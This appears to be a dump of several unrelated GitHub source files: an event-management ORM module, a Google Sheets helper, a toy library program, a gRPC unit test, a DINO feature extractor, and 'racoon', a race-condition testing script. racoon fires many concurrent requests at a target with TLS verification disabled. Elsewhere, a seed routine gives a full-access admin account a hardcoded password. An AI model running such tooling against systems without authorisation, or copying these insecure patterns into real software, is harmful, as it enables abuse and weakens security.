badge_type=c.ATTENDEE_BADGE,\n )\n self.add(attendee)\n\n all_access_group = AccessGroup(\n name='All Access',\n access={section: '5' for section in c.ADMIN_PAGES}\n )\n\n test_developer_account = AdminAccount(\n attendee=attendee,\n )\n\n if not c.SAML_SETTINGS:\n test_developer_account.hashed = bcrypt.hashpw('magfest', bcrypt.gensalt())\n \n test_developer_account.access_groups.append(all_access_group)\n\n self.add(all_access_group)\n self.add(test_developer_account)\n self.commit()\n\n return True\n\n def set_relation_ids(self, instance, field, cls, value):\n values = set(s for s in listify(value) if s and s != 'None')\n relations = self.query(cls).filter(cls.id.in_(values)).all() if values else []\n setattr(instance, field, relations)\n\n def bulk_insert(self, models):\n \"\"\"\n Convenience method for bulk inserting model objects.\n\n In general, doing a bulk insert is much faster than individual\n inserts, but the whole insert will fail if a single object\n violates the database's referential integrity.\n\n This function does a bulk insert, but if an `IntegrityError` is\n encountered, it falls back to inserting the model objects\n one-by-one, and ignores the individual integrity errors.\n\n Arguments:\n models (list): A list of sqlalchemy model objects.\n\n Returns:\n list: A list of model objects that was succesfully inserted.\n The returned list will not include any model objects that\n failed insertion.\n \"\"\"\n for model in models:\n model.presave_adjustments()\n try:\n self.bulk_save_objects(models)\n self.commit()\n return models\n except IntegrityError as error:\n log.debug('Bulk insert failed: {}', error)\n self.rollback()\n\n # Bulk insert failed, so insert one at a time and ignore errors\n inserted_models = []\n for model in models:\n try:\n self.add(model)\n self.commit()\n inserted_models.append(model)\n except IntegrityError:\n log.debug('Individual insert failed: {}', error)\n # Ignore db integrity errors\n self.rollback()\n return inserted_models\n\n # ========================\n # mivs\n # ========================\n\n def logged_in_studio(self):\n try:\n return self.indie_studio(cherrypy.session.get('studio_id'))\n except Exception:\n raise HTTPRedirect('../mivs/studio')\n\n def logged_in_judge(self):\n judge = self.admin_attendee().admin_account.judge\n if judge:\n return judge\n else:\n raise HTTPRedirect(\n '../accounts/homepage?message={}',\n 'You have been given judge access but not had a judge entry created for you - '\n 'please contact a MIVS admin to correct this.')\n\n def code_for(self, game):\n if game.unlimited_code:\n return game.unlimited_code\n else:\n for code in self.logged_in_judge().codes:\n if code.game == game:\n return code\n\n def delete_screenshot(self, screenshot):\n self.delete(screenshot)\n try:\n os.remove(screenshot.filepath)\n except Exception:\n pass\n self.commit()\n\n def indie_judges(self):\n return self.query(IndieJudge).join(IndieJudge.admin_account).join(AdminAccount.attendee) \\\n .order_by(Attendee.full_name)\n\n def indie_games(self):\n return self.query(IndieGame).join(IndieStudio).options(\n joinedload(IndieGame.studio), joinedload(IndieGame.reviews)).order_by(IndieStudio.name, IndieGame.title)\n\n # =========================\n # mits\n # =========================\n\n def log_in_as_mits_team(\n self, team_id, redirect_to='../mits/index'):\n try:\n team = self.mits_team(team_id)\n duplicate_teams = []\n while team.duplicate_of:\n duplicate_teams.append(team.id)\n team = self.mits_team(team.duplicate_of)\n assert team.id not in duplicate_teams, 'circular reference in duplicate_of: {}'.format(\n duplicate_teams)\n except Exception:\n log.error('attempt to log into invalid team {}', team_id, exc_info=True)\n raise HTTPRedirect('../mits/login_explanation')\n else:\n cherrypy.session['mits_team_id'] = team.id\n raise HTTPRedirect(redirect_to)\n\n def logged_in_mits_team(self):\n try:\n team = self.mits_team(cherrypy.session.get('mits_team_id'))\n assert not team.deleted or team.duplicate_of\n except Exception:\n raise HTTPRedirect('../mits/login_explanation')\n else:\n if team.duplicate_of:\n # The currently-logged-in team was deleted, so log\n # back in as the correct team.\n self.log_as_as_mits_team(team.id)\n else:\n return team\n\n def mits_teams(self, include_deleted=False):\n if include_deleted:\n deleted_filter = []\n else:\n deleted_filter = [MITSTeam.deleted == False] # noqa: E712\n return self.query(MITSTeam).filter(*deleted_filter).options(\n joinedload(MITSTeam.applicants).subqueryload(MITSApplicant.attendee),\n joinedload(MITSTeam.games),\n joinedload(MITSTeam.schedule),\n ).order_by(MITSTeam.name)\n\n def delete_mits_file(self, model):\n try:\n os.remove(model.filepath)\n except Exception:\n log.error('Unexpected error deleting MITS file {}', model.filepath)\n\n # Regardless of whether removing the file from the\n # filesystem succeeded, we still want the delete it from the\n # database. The most likely cause of failure is if the file\n # was already deleted or is otherwise not present, so it\n # wouldn't make sense to keep the database record around.\n self.delete(model)\n self.commit()\n\n # =========================\n # panels\n # =========================\n\n def panel_apps(self):\n return self.query(PanelApplication).order_by('applied').all()\n\n def panel_applicants(self):\n return self.query(PanelApplicant).options(joinedload(PanelApplicant.application)) \\\n .order_by('first_name', 'last_name')\n\n # =========================\n # tabletop\n # =========================\n\n def entrants(self):\n return self.query(TabletopEntrant).options(\n joinedload(TabletopEntrant.reminder),\n joinedload(TabletopEntrant.attendee),\n subqueryload(TabletopEntrant.tournament).subqueryload(TabletopTournament.event))\n\n def entrants_by_phone(self):\n entrants = defaultdict(list)\n for entrant in self.entrants():\n cellphone = normalize_phone(entrant.attendee.cellphone)\n entrants[cellphone].append(entrant)\n return entrants\n\n @classmethod\n def model_mixin(cls, model):\n if model.__name__ in ['SessionMixin', 'QuerySubclass']:\n target = getattr(cls, model.__name__)\n else:\n for target in cls.all_models():\n if target.__name__ == model.__name__:\n break\n else:\n raise ValueError('No existing model with name {}'.format(model.__name__))\n\n for name in dir(model):\n if not name.startswith('_'):\n attr = getattr(model, name)\n if hasattr('target', '__table__') and name in target.__table__.c:\n attr.key = attr.key or name\n attr.name = attr.name or name\n attr.table = target.__table__\n target.__table__.c.replace(attr)\n else:\n setattr(target, name, attr)\n return target\n\n\n@on_startup(priority=1)\ndef initialize_db(modify_tables=False):\n \"\"\"\n Initialize the session on startup.\n\n We want to do this only after all other plugins have had a chance to\n initialize and add their 'mixin' data (i.e. extra columns) into the models.\n\n Also, it's possible that the DB is still initializing and isn't ready to\n accept connections, so, if this fails, keep trying until we're able to\n connect.\n\n This should be the ONLY spot (except for maintenance tools) in all of core\n ubersystem or any plugins that attempts to create tables by passing\n drop=True or modify_tables=True or initialize=True to\n Session.initialize_db()\n \"\"\"\n num_tries_remaining = 10\n while not stopped.is_set():\n try:\n Session.initialize_db(modify_tables=modify_tables, initialize=True)\n except KeyboardInterrupt:\n log.critical('DB initialize: Someone hit Ctrl+C while we were starting up')\n except Exception:\n num_tries_remaining -= 1\n if num_tries_remaining == 0:\n log.error(\"DB initialize: couldn't connect to DB, we're giving up\")\n raise\n log.error(\"DB initialize: can't connect to / initialize DB, will try again in 5 seconds\", exc_info=True)\n stopped.wait(5)\n else:\n break\n\n\n@on_startup\ndef _attendee_validity_check():\n orig_getter = Session.SessionMixin.attendee\n\n @wraps(orig_getter)\n def with_validity_check(self, *args, **kwargs):\n allow_invalid = kwargs.pop('allow_invalid', False)\n attendee = orig_getter(self, *args, **kwargs)\n if not allow_invalid and not attendee.is_new and \\\n not self.current_admin_account and not attendee.is_valid:\n raise HTTPRedirect('../preregistration/invalid_badge?id={}', attendee.id)\n else:\n return attendee\n Session.SessionMixin.attendee = with_validity_check\n\n\ndef _presave_adjustments(session, context, instances='deprecated'):\n for model in chain(session.dirty, session.new):\n model.presave_adjustments()\n for model in session.deleted:\n model.predelete_adjustments()\n\n\ndef _track_changes(session, context, instances='deprecated'):\n states = [\n (c.CREATED, session.new),\n (c.UPDATED, session.dirty),\n (c.DELETED, session.deleted)]\n\n for action, instances in states:\n for instance in instances:\n if instance.__class__ not in Tracking.UNTRACKED:\n Tracking.track(action, instance)\n\n\ndef register_session_listeners():\n \"\"\"\n The order in which we register these listeners matters.\n \"\"\"\n listen(Session.session_factory, 'before_flush', _presave_adjustments)\n listen(Session.session_factory, 'after_flush', _track_changes)\n\n\nregister_session_listeners()\n","repo_name":"magfest/ubersystem","sub_path":"uber/models/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":95323,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"3"}
+{"seq_id":"10210188777","text":"import logging\nfrom typing import List\n\nimport gspread\nimport pandas as pd\nfrom gspread_dataframe import set_with_dataframe\n\nfrom ranking_table_tennis.configs import ConfigManager\n\nlogger = logging.getLogger(__name__)\n\n\ndef upload_sheet_from_df(\n spreadsheet_id: str,\n sheet_name: str,\n df: pd.DataFrame,\n headers: List[str] = None,\n include_index: bool = False,\n include_df_headers: bool = True,\n) -> None:\n \"\"\"\n Saves headers and df data into given sheet_name in spreadsheet_id.\n If sheet_name does not exist, it will be created.\n\n :param include_index: will upload DataFrame index as the first column. It is False by default.\n :param include_df_headers: will upload DataFrame column names as the first row.\n It is True by default.\n :param headers: This list will replace df column names and must have the same length.\n If headers are given, include_df_headers is turn to True.\n \"\"\"\n logger.info(\"< Saving '%s' @ '%s'\", sheet_name, spreadsheet_id)\n try:\n worksheet = _get_ws_from_spreadsheet(sheet_name, spreadsheet_id)\n\n df_headers = df.copy()\n if include_index:\n df_headers.reset_index(inplace=True)\n if headers:\n df_headers.columns = headers\n include_df_headers = True\n\n set_with_dataframe(\n worksheet,\n df_headers,\n resize=True, # include_index=include_index,\n include_column_header=include_df_headers,\n )\n\n except ConnectionError:\n logger.warn(\"!! FAILED to upload '%s' @ '%s'\", sheet_name, spreadsheet_id)\n\n\ndef load_and_upload_sheet(filename: str, sheet_name: str, spreadsheet_id: str) -> None:\n df = pd.read_excel(filename, sheet_name, index_col=None, header=None, na_filter=False)\n upload_sheet_from_df(spreadsheet_id, sheet_name, df, include_df_headers=False) # index is pid\n\n\ndef create_n_tour_sheet(spreadsheet_id: str, tid: str) -> None:\n \"\"\"\n Create sheet corresponding to n_tour tournament by duplication of the first-tournament sheet.\n A new sheeet is created in given spreadsheet_id as follows:\n 1- first-tournament sheet is duplicated\n 2- Two replacements are performed in the new sheet, considering n_tour.\n For example, if n_tour=4, value of A1 cell and sheet title will change\n 'Tournament 01'->'Tournament 04'\n :param spreadsheet_id: spreadsheet where duplication will be performed\n :param tid: tournament to create\n :return: None\n \"\"\"\n cfg = ConfigManager().current_config\n first_key = f\"{cfg.labels.Tournament} 01\"\n replacement_key = f\"{cfg.labels.Tournament} {tid[-2:]}\"\n\n try:\n gc = _get_gc()\n wb = gc.open_by_key(spreadsheet_id)\n sheetname_listed = [ws.title for ws in wb.worksheets() if first_key in ws.title]\n if sheetname_listed:\n sheetname = sheetname_listed[0]\n new_sheetname = sheetname.replace(first_key, replacement_key)\n if new_sheetname in [ws.title for ws in wb.worksheets()]:\n out_ws = wb.worksheet(new_sheetname)\n wb.del_worksheet(out_ws)\n ws = wb.worksheet(sheetname)\n dup_ws = wb.duplicate_sheet(ws.id, new_sheet_name=new_sheetname)\n dup_cell_value = dup_ws.acell(\"A1\", value_render_option=\"FORMULA\").value\n dup_ws.update_acell(\"A1\", dup_cell_value.replace(first_key, replacement_key))\n logger.info(\n \"> Creating '%s' @ '%s' from '%s'\", new_sheetname, spreadsheet_id, sheetname\n )\n else:\n logger.warn(\"!! FAIL TO DUPLICATE '%s' do not exist @ '%s'\", first_key, spreadsheet_id)\n\n except ConnectionError:\n logger.warn(\"!! Connection Error. FAIL TO DUPLICATE '%s' @ '%s'\", first_key, spreadsheet_id)\n\n\ndef publish_to_web(tid: str, show_on_web=False) -> None:\n if show_on_web:\n cfg = ConfigManager().current_config\n for spreadsheet_id in cfg.io.published_on_web_spreadsheets_id:\n create_n_tour_sheet(spreadsheet_id, tid)\n\n\ndef _in_colab() -> bool:\n # Verify if it is running on colab\n try:\n import google.colab # noqa\n\n _in_colab = True\n except ModuleNotFoundError:\n _in_colab = False\n\n return _in_colab\n\n\ndef _get_gc() -> gspread.Client:\n try:\n if _in_colab():\n from google.colab import auth\n\n auth.authenticate_user()\n from oauth2client.client import GoogleCredentials # type: ignore\n\n gc = gspread.authorize(GoogleCredentials.get_application_default())\n else:\n gc = gspread.oauth()\n except FileNotFoundError:\n logger.warn(\"!! The .json key file has not been configured. Upload will fail.\")\n raise ConnectionError\n # except OSError:\n # logger.warn(\"!!Connection failure. Upload will fail.\")\n\n return gc\n\n\ndef _get_ws_from_spreadsheet(sheet_name: str, spreadsheet_id: str):\n gc = _get_gc()\n wb = gc.open_by_key(spreadsheet_id)\n if sheet_name not in [ws.title for ws in wb.worksheets()]:\n wb.add_worksheet(sheet_name, rows=1, cols=1)\n ws = wb.worksheet(sheet_name)\n\n return ws\n","repo_name":"srvanrell/ranking-table-tennis","sub_path":"ranking_table_tennis/helpers/gspread.py","file_name":"gspread.py","file_ext":"py","file_size_in_byte":5147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"15512095556","text":"\r\nclass Library:\r\n \r\n def __init__(self, list_of_books) -> None:\r\n self.available_books = list_of_books\r\n \r\n # to display all the available books\r\n def display_available_books(self):\r\n for books in self.available_books:\r\n print(f'Available Books are : {books}')\r\n \r\n def lend_book(self, requested_book):\r\n if requested_book in self.available_books:\r\n print(f'You have now borrowd the book {requested_book}')\r\n self.available_books.remove(requested_book)\r\n \r\n # elif book_count is 2 and requested_book in self.available_books:\r\n # print(f'You have now borrowd the {book_count} books name {requested_book}')\r\n # self.available_books.remove(requested_book) \r\n \r\n else:\r\n print('Sorry , the book is not available in book list') \r\n \r\n def add_book(self, returned_book):\r\n # if no_of_book is 1:\r\n # self.available_books.append(returned_book)\r\n # elif no_of_book is 2:\r\n self.available_books.append(returned_book)\r\n \r\n \r\nclass Customer:\r\n \r\n def request_books(self):\r\n #borrow_book_count = 0\r\n #print('Enter the how many book you wanna borrow, limitation is 2')\r\n #book_want = int(input())\r\n #if book_want is 1:\r\n print('Enter the name of the book you would like to borrow:')\r\n self.book = input() # though book name is string\r\n #borrow_book_count += 1\r\n return self.book\r\n # elif book_want is 2:\r\n # print('Enter the name of the books you would like to borrow:')\r\n # # though book name is string\r\n # self.books = input().split(',')\r\n # borrow_book_count += book_want \r\n # return self.books, borrow_book_count\r\n \r\n \r\n def return_book(self):\r\n #book_returned = int(input('Enter the no. of books wanna returned: '))\r\n #if book_returned is 1:\r\n print('Enter the name of the book which you are returning:')\r\n self.book = input()\r\n return self.book\r\n # elif book_returned is 2:\r\n # print('Enter the name of the book which you are returning:')\r\n # self.books = input().split(',')\r\n # return self.books\r\n \r\n\r\nbook_list = ['Time Management', 'Grow Enrich', 'C++ Paradigm', 'For One More Day']\r\nlibrary = Library(book_list)\r\ncustomer = Customer()\r\n\r\nwhile True:\r\n print('Enter 1 to display the available books')\r\n print('Enter 2 to request for a book or books')\r\n print('Enter 3 to return a book or books')\r\n print('Enter 4 to exit')\r\n \r\n user_choice = int(input('Enter the choice: '))\r\n \r\n if user_choice == 1:\r\n library.display_available_books()\r\n \r\n elif user_choice == 2:\r\n requested_book = customer.request_books()\r\n library.lend_book(requested_book)\r\n \r\n elif user_choice == 3:\r\n returned_book = customer.return_book()\r\n library.add_book(returned_book)\r\n \r\n elif user_choice == 4:\r\n print('Exiting...')\r\n exit()","repo_name":"JaberKh16/Python-Fundamentals-Concept-Practices","sub_path":"Section-17 Python Object Oriented Programming/7.Encapsulation or Data Hiding/17.7.7 Library Example On Encapsulation.py","file_name":"17.7.7 Library Example On Encapsulation.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"110599998","text":" \nimport unittest\nimport grpc\nimport sys\nimport time\nfrom delayedassert import expect, expect_equal, assert_expectations\nimport logging\nimport os\n\nimport MexController as mex_controller\n\ncontroller_address = os.getenv('AUTOMATION_CONTROLLER_ADDRESS', '127.0.0.1:55001')\n\nmex_root_cert = 'mex-ca.crt'\nmex_cert = 'mex-client.crt'\nmex_key = 'mex-client.key'\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\nclass tc(unittest.TestCase):\n @classmethod\n def setUpClass(self):\n stamp = str(time.time())\n self.cluster_name = 'cluster' + stamp\n self.operator_name = 'dmuus'\n self.cloud_name = 'tmocloud-1'\n self.flavor_name = 'c1.small' + stamp\n self.developer_name = 'developer' + stamp\n\n# self.operator = mex_controller.Operator(operator_name = self.operator_name) \n self.cloudlet = mex_controller.Cloudlet(cloudlet_name = self.cloud_name,\n operator_org_name = self.operator_name,\n number_of_dynamic_ips = 254)\n self.flavor = mex_controller.Flavor(flavor_name=self.flavor_name, ram=1024, vcpus=1, disk=1)\n self.controller = mex_controller.MexController(controller_address = controller_address,\n# root_cert = mex_root_cert,\n# key = mex_key,\n# client_cert = mex_cert\n )\n #self.cluster = mex_controller.Cluster(cluster_name=cluster_name,\n # default_flavor_name=flavor_name)\n\n self.cluster_instance = mex_controller.ClusterInstance(cluster_name=self.cluster_name,\n cloudlet_name=self.cloud_name,\n operator_org_name=self.operator_name,\n developer_org_name=self.developer_name,\n flavor_name=self.flavor_name)\n\n self.controller.create_flavor(self.flavor.flavor)\n #self.controller.create_operator(self.operator.operator)\n #self.controller.create_cloudlet(self.cloudlet.cloudlet)\n\n def test_CreateClusterTwice(self):\n # [Documentation] ClusterInst - User shall not be a to create the same cluster instance twice\n # ... create the same cluster twice\n # ... verify error of 'Key already exists' is retruned\n\n # print the existing cluster instances\n clusterinst_pre = self.controller.show_cluster_instances()\n\n # create a new cluster and cluster instance\n #create_cluster_resp = self.controller.create_cluster(self.cluster.cluster)\n self.controller.create_cluster_instance(self.cluster_instance.cluster_instance)\n #time.sleep(1)\n\n # create the cluster instance which already exists\n try:\n resp = self.controller.create_cluster_instance(self.cluster_instance.cluster_instance)\n except:\n print('create cluster instance failed')\n # print the cluster instances after error\n clusterinst_post = self.controller.show_cluster_instances()\n\n expect_equal(self.controller.response.code(), grpc.StatusCode.UNKNOWN, 'status code')\n expect_equal(self.controller.response.details(), 'ClusterInst key {\"cluster_key\":{\"name\":\"' + self.cluster_name + '\"},\"cloudlet_key\":{\"organization\":\"' + self.operator_name + '\",\"name\":\"' + self.cloud_name + '\"},\"organization\":\"' + self.developer_name + '\"} already exists', 'error details')\n expect_equal(len(clusterinst_pre)+1, len(clusterinst_post), 'same number of cluster')\n assert_expectations()\n\n def tearDown(self):\n self.controller.delete_cluster_instance(self.cluster_instance.cluster_instance)\n #self.controller.delete_cluster(self.cluster.cluster)\n self.controller.delete_flavor(self.flavor.flavor)\n #self.controller.delete_cloudlet(self.cloudlet.cloudlet)\n #self.controller.delete_operator(self.operator.operator)\n\nif __name__ == '__main__':\n suite = unittest.TestLoader().loadTestsFromTestCase(tc)\n sys.exit(not unittest.TextTestRunner().run(suite).wasSuccessful())\n\n","repo_name":"mobiledgex/edge-cloud-qa","sub_path":"testcases/controller/cluster/test_clusterInstAdd_keyExists.py","file_name":"test_clusterInstAdd_keyExists.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"8323936571","text":"import re, sys, requests, threading, argparse\nimport concurrent.futures\nfrom agent import Agent\n\nrequests.packages.urllib3.disable_warnings()\n\ndef getInfo(inp, a):\n fr = open(inp, 'r')\n it = 0\n nowdata = False\n for line in fr:\n if (it == 0):\n a.setMethod(line)\n a.setUrl(line)\n a.setParam(line)\n elif (line != '\\n' and (not nowdata)):\n a.setHeaders(line)\n elif (line == '\\n'):\n nowdata = True\n elif (nowdata):\n a.setData(line)\n it+=1\n\ndef sendPost(i, u, x, y, z):\n r = requests.post(u, headers=x, params=y, data=z, verify=False)\n print('thread-'+ str(i) + '> ' + str(r.content))\n\ndef sendPut(i, u, x, y, z):\n r = requests.put(u, headers=x, params=y, data=z, verify=False)\n print('thread-'+ str(i) + '> ' + str(r.content))\n\ndef sendGet(i, u, x, y, z):\n r = requests.get(u, headers=x, params=y, data=z, verify=False)\n print('thread-'+ str(i) + '> ' + str(r.content))\n\ndef sendPatch(i, u, x, y, z):\n r = requests.patch(u, headers=x, params=y, data=z, verify=False)\n print('thread-'+ str(i) + '> ' + str(r.content))\n\ndef sendReq(a, w, h):\n u = h + '://' + a.url\n param = a.param\n data = a.data\n headers = a.headers\n if (a.method == 'POST'):\n with concurrent.futures.ThreadPoolExecutor(max_workers=w) as executor:\n for i in range (0, w):\n executor.submit(sendPost, i, u, headers, param, data)\n elif (a.method == 'PUT'):\n with concurrent.futures.ThreadPoolExecutor(max_workers=w) as executor:\n for i in range (0, w):\n executor.submit(sendPut, i, u, headers, param, data)\n elif (a.method == 'GET'):\n with concurrent.futures.ThreadPoolExecutor(max_workers=w) as executor:\n for i in range (0, w):\n executor.submit(sendGet, i, u, headers, param, data)\n elif (a.method == 'PATCH'):\n with concurrent.futures.ThreadPoolExecutor(max_workers=w) as executor:\n for i in range (0, w):\n executor.submit(sendPatch, i, u, headers, param, data)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='racoon - race condition automation')\n parser.add_argument('-t', '--target', type=str, help='target file config')\n parser.add_argument('--https', help='use https. default: no', action='store_true')\n parser.add_argument('-w', '--worker', type=int, help='how many workers run in a time')\n args = parser.parse_args()\n\n if(not args.target or not args.worker):\n parser.print_help()\n sys.exit(1)\n\n print('Starting '+str(args.worker)+' threads to test '+args.target+'...')\n a = Agent()\n getInfo(args.target, a)\n sendReq(a, args.worker, 'https') if args.https else sendReq(a, args.worker, 'http')","repo_name":"fachrioktavian/racoon","sub_path":"racoon.py","file_name":"racoon.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"43093908166","text":"import os\nimport sys\nimport pickle\nimport argparse\n\nimport torch\nfrom torch import nn\nimport torch.distributed as dist\nimport torch.backends.cudnn as cudnn\nfrom torchvision import models as torchvision_models\nfrom torchvision import transforms as pth_transforms\nfrom torchvision import datasets\nfrom PIL import Image, ImageFile\nimport numpy as np\nimport pandas as pd\n\nimport utils\nimport vision_transformer as vits\n\n\ndef extract_dino_features(model, data_loader, use_cuda=True, multiscale=False, return_csv=False, save_path = \"Features/\"):\n metric_logger = utils.MetricLogger(delimiter=\" \")\n features = []\n i = 0; all_samples = []; all_labels = []; \n for samples, index in metric_logger.log_every(data_loader, 10):\n if use_cuda: \n samples = samples.cuda(non_blocking=True)\n index = index.cuda(non_blocking=True)\n \n #-----\n sample_fname, sample_class = data_loader.dataset.samples[i]; i += 1\n pos_fname = str.rfind(sample_fname, \"/\")\n sample_fname = sample_fname[pos_fname+1:] \n all_samples.append(sample_fname)\n all_labels.append(sample_class)\n #print (sample_fname) #csv_name\n #-----\n \n if multiscale:\n feats = utils.multi_scale(samples, model)\n else:\n feats = model(samples).clone()\n \n if not features:\n print(f\"Storing features into tensor of shape [{len(data_loader.dataset)}, {feats.shape[-1]}]\")\n \n if use_cuda: \n features.extend(feats.cpu().detach().numpy().reshape([1,-1]))\n else: \n features.expand(feats.detach().numpy())\n \n if return_csv == True: \n return np.array(features), all_samples, all_labels\n else:\n return np.array(features)\n\n\ndef main(): \n parser = argparse.ArgumentParser('Image Retrieval on revisited Paris and Oxford')\n parser.add_argument('--data_path', default='/path/to/revisited_paris_oxford/', type=str)\n parser.add_argument('--dataset', default='roxford5k', type=str, choices=['roxford5k', 'rparis6k'])\n parser.add_argument('--multiscale', default=False, type=utils.bool_flag)\n parser.add_argument('--imsize', default=224, type=int, help='Image size')\n parser.add_argument('--pretrained_weights', default='', type=str, help=\"Path to pretrained weights to evaluate.\")\n parser.add_argument('--train_data_path', default='', type=str, help=\"Path to train samples.\")\n parser.add_argument('--test_data_path', default=None, type=str, help=\"Path to test samples.\")\n parser.add_argument('--output_dir', default='', type=str, help=\"Path to test samples.\")\n parser.add_argument('--use_cuda', default=True, type=utils.bool_flag)\n parser.add_argument('--gpu', default=0, type=int, help='GPU to use')\n parser.add_argument('--arch', default='vit_small', type=str, help='Architecture')\n parser.add_argument('--patch_size', default=16, type=int, help='Patch resolution of the model.')\n parser.add_argument(\"--checkpoint_key\", default=\"teacher\", type=str,\n help='Key to use in the checkpoint (example: \"teacher\")')\n parser.add_argument('--num_workers', default=10, type=int, help='Number of data loading workers per GPU.')\n parser.add_argument(\"--dist_url\", default=\"env://\", type=str, help=\"\"\"url used to set up\n distributed training; see https://pytorch.org/docs/stable/distributed.html\"\"\")\n parser.add_argument(\"--local_rank\", default=0, type=int, help=\"Please ignore and do not set this argument.\")\n parser.add_argument(\"--num-channels\", default=3, type=int, help=\"\"\"Number of input channels\"\"\")\n parser.add_argument(\"--port\", default='29500', type=str, help=\"\"\"port for parallelization\"\"\")\n args = parser.parse_args()\n\n utils.init_distributed_mode(args)\n print(\"git:\\n {}\\n\".format(utils.get_sha()))\n print(\"\\n\".join(\"%s: %s\" % (k, str(v)) for k, v in sorted(dict(vars(args)).items())))\n cudnn.benchmark = True\n\n # ============ preparing data ... ============\n if args.num_channels == 3: \n transform = pth_transforms.Compose([\n pth_transforms.ToTensor(),\n pth_transforms.Resize(args.imsize, pth_transforms.InterpolationMode.BICUBIC),\n pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n #pth_transforms.Normalize((0.5,0.5,0.5), (0.5,0.5,0.5)),\n ])\n else: \n transform = pth_transforms.Compose([\n pth_transforms.ToTensor(),\n pth_transforms.Resize(args.imsize, pth_transforms.InterpolationMode.BICUBIC),\n pth_transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n pth_transforms.Grayscale(1),\n ])\n \n dataset_train = datasets.ImageFolder(args.train_data_path, transform=transform)\n sampler = torch.utils.data.DistributedSampler(dataset_train, shuffle=False)\n data_loader_train = torch.utils.data.DataLoader(\n dataset_train,\n sampler=sampler,\n batch_size=1,\n num_workers=args.num_workers,\n pin_memory=True,\n drop_last=False,\n )\n \n if args.test_data_path: \n dataset_query = datasets.ImageFolder(args.test_data_path, transform=transform)\n \n if args.test_data_path: \n data_loader_query = torch.utils.data.DataLoader(\n dataset_query,\n batch_size=1,\n num_workers=args.num_workers,\n pin_memory=True,\n drop_last=False,\n )\n \n print(f\"train: {len(dataset_train)} imgs\") \n if args.test_data_path: \n print(f\"query: {len(dataset_query)} imgs\")\n \n \n # ============ building network ... ============\n if \"vit\" in args.arch:\n model = vits.__dict__[args.arch](patch_size=args.patch_size, num_channels=args.num_channels, num_classes=0)\n print(f\"Model {args.arch} {args.patch_size}x{args.patch_size} built.\")\n elif \"xcit\" in args.arch:\n model = torch.hub.load('facebookresearch/xcit:main', args.arch, num_classes=0)\n elif args.arch in torchvision_models.__dict__.keys():\n model = torchvision_models.__dict__[args.arch](num_classes=0)\n else:\n print(f\"Architecture {args.arch} non supported\")\n sys.exit(1)\n if args.use_cuda:\n model.cuda()\n model.eval()\n\n # load pretrained weights\n if os.path.isfile(args.pretrained_weights):\n state_dict = torch.load(args.pretrained_weights, map_location=\"cpu\")\n if args.checkpoint_key is not None and args.checkpoint_key in state_dict:\n print(f\"Take key {args.checkpoint_key} in provided checkpoint dict\")\n state_dict = state_dict[args.checkpoint_key]\n # remove `module.` prefix\n state_dict = {k.replace(\"module.\", \"\"): v for k, v in state_dict.items()}\n # remove `backbone.train_names` prefix induced by multicrop wrapper\n state_dict = {k.replace(\"backbone.\", \"\"): v for k, v in state_dict.items()}\n msg = model.load_state_dict(state_dict, strict=False)\n print('Pretrained weights found at {} and loaded with msg: {}'.format(args.pretrained_weights, msg))\n elif args.arch == \"vit_small\" and args.patch_size == 16:\n print(\"Since no pretrained weights have been provided, we load pretrained DINO weights on Google Landmark v2.\")\n model.load_state_dict(torch.hub.load_state_dict_from_url(url=\"https://dl.fbaipublicfiles.com/dino/dino_vitsmall16_googlelandmark_pretrain/dino_vitsmall16_googlelandmark_pretrain.pth\"))\n else:\n print(\"Warning: We use random weights.\")\n\n ############################################################################\n \n os.makedirs(args.output_dir, exist_ok = True)\n \n # Step 1: extract features\n train_features, train_names, train_labels = extract_dino_features(model, data_loader_train, args.use_cuda, multiscale=args.multiscale, return_csv = True, save_path = args.output_dir + \"train/\")\n #train_features = nn.functional.normalize(train_features, dim=1, p=2)\n \n csv_dict = {\"namefile\": train_names, \"label\": train_labels}\n csv_dict = pd.DataFrame.from_dict(csv_dict)\n csv_dict.to_csv(args.output_dir + \"train_features.csv\", index = False)\n np.save (args.output_dir + \"train_features.npy\", train_features)\n \n \n if args.test_data_path: \n query_features, query_names, query_labels = extract_dino_features(model, data_loader_query, args.use_cuda, multiscale=args.multiscale, return_csv = True, save_path = args.output_dir + \"test/\")\n #query_features = nn.functional.normalize(query_features, dim=1, p=2)\n np.save (args.output_dir + \"test_features.npy\", query_features)\n \n csv_dict = {\"namefile\": query_names, \"label\": query_labels}\n csv_dict = pd.DataFrame.from_dict(csv_dict)\n csv_dict.to_csv(args.output_dir + \"test_features.csv\", index = False)\n \n\nif __name__ == '__main__':\n \"\"\"\n param = sys.argv.append\n param (\"--arch\"); param(\"vit_small\"); param (\"--imsize\"); param(\"256\"); \n param (\"--gpu\"); param(\"5\"); param (\"--multiscale\"); param(\"0\"); \n param (\"--train_data_path\"); param (\"Data/he_data/he_7k/\"); \n #param (\"--test_data_path\"); param(\"Data/he_data/CRC-VAL-HE-7K-CONT/\"); \n param (\"--pretrained_weights\"); param(\"/scr/rfonnegr/sources/pretrains/dino/checkpoint.pth\") #param(\"/scr/rfonnegr/sources/pretrains/dino/dino_cells.pth\");\n param (\"--output_dir\"); param(\"Features/he_7k_jc/\"); \n param (\"--num-channels\"); param(\"3\"); \n \"\"\"\n main()","repo_name":"rubenfonnegra/dino_cvd","sub_path":"extract_features.py","file_name":"extract_features.py","file_ext":"py","file_size_in_byte":9467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
